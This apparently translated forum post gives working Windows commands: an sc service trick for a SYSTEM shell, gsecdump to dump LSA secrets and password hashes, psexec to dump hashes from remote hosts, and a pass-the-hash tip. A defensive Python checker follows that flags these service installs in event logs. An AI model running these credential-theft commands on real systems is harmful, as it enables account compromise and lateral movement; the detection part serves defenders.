To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
to get the hashes from active logon sessions of a remote system.
" y- T/ {6 m, L Z) _& ]These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to load the hash information just captured with gsecdump into the local lsass process, achieving a hash injection attack. The foreigners really are impressive; administrators are going to have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need to have the password cracked at all; it just takes the tool. As the original article puts it well, whether the password is 4 characters or 127 characters, once you have the hash, it's 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
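For the defender's side of the post above, here is an added example (not from the post, from gsecdump, or from Sysinternals) that shows what the two techniques look like in the Windows System log: the `sc create ... cmd.exe` trick leaves an Event ID 7045 "service installed" record whose image is a command interpreter, typically followed by a 7000 start failure with the same 1053 timeout text shown above (cmd.exe never talks to the Service Control Manager), and `psexec -s -c` leaves a 7045 record for the PSEXESVC service. The records below are constructed samples in a simplified dict shape (the field names ServiceName, ImagePath and AccountName follow the 7045 event data; the 7000 record is simplified to a ServiceName and Message); the checker flags both patterns.

```python
from typing import Dict, List

# Command interpreters that have no business being a service's ImagePath.
SHELL_IMAGES = {"cmd.exe", "command.com", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe"}

# Constructed sample System-log records: 7045 = a service was installed,
# 7000 = a service failed to start. Made-up samples, not captured from a host.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 7045, "Time": "10:01:02", "ServiceName": "shellcmdline",
     "ImagePath": "C:\\WINDOWS\\system32\\cmd.exe /K start",
     "AccountName": "LocalSystem"},
    {"EventID": 7000, "Time": "10:01:33", "ServiceName": "shellcmdline",
     "Message": "The service did not respond to the start or control request "
                "in a timely fashion."},
    {"EventID": 7045, "Time": "10:05:30", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.EXE", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Time": "10:07:00", "ServiceName": "Spooler",
     "ImagePath": "%SystemRoot%\\system32\\spoolsv.exe",
     "AccountName": "LocalSystem"},
]


def image_basename(image_path: str) -> str:
    """Lower-cased executable name from an ImagePath, handling quotes and arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        exe = path[1:end] if end > 0 else path[1:]
    else:
        exe = path.split(" ", 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_service_installs(events: List[Dict]) -> Dict[str, List[str]]:
    """Map service name -> reasons for every 7045 record matching the patterns above."""
    failed_starts = {e["ServiceName"] for e in events if e["EventID"] == 7000}
    findings: Dict[str, List[str]] = {}
    for e in events:
        if e["EventID"] != 7045:
            continue
        reasons = []
        exe = image_basename(e["ImagePath"])
        if exe in SHELL_IMAGES:
            reasons.append(f"service image is a command interpreter: {exe}")
            if e["ServiceName"] in failed_starts:
                # An interpreter never calls StartServiceCtrlDispatcher, so the SCM
                # times out (error 1053) right after the install: the exact sequence
                # shown in the post.
                reasons.append("start timed out right after install")
        if e["ServiceName"].upper() == "PSEXESVC" or exe == "psexesvc.exe":
            reasons.append("PsExec service installed (remote command execution)")
        if reasons and e.get("AccountName") == "LocalSystem":
            reasons.append("runs as LocalSystem")
        if reasons:
            findings[e["ServiceName"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in suspicious_service_installs(SAMPLE_EVENTS).items():
        print(f"{name}:")
        for r in reasons:
            print(f"  - {r}")
```

Running it against the samples reports shellcmdline (interpreter image, immediate start timeout, LocalSystem) and PSEXESVC (PsExec install, LocalSystem) and stays silent on the Spooler record; in practice you would feed it 7045/7000 records exported from the System log of the hosts you administer.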